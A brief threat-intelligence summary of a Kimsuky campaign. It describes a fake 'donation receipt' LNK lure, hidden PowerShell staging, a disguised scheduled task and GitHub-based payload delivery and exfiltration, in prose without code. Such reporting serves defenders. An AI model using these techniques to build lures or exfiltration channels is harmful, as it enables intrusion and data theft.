Kimsuky is attributed in the source to a Korean-language lure named “donation receipt.pdf.lnk,” which masquerades as a Hangul document and child-welfare donation receipt. When executed, the LNK launches hidden PowerShell, decodes embedded Base64 content, writes a second-stage script to the temp directory, and downloads additional payloads from GitHub and raw.githubusercontent.com. The script registers a scheduled task named “BitLocker MDM policy Refresh” for persistence, stages host-specific scripts in a GitHub repository, and uploads collected files through the GitHub API using Base64-encoded content. The activity matters because GitHub is used both as delivery infrastructure and as a data-exfiltration channel, while layered Base64 encoding, obfuscated variables, temporary-file cleanup, and hidden PowerShell execution support evasion.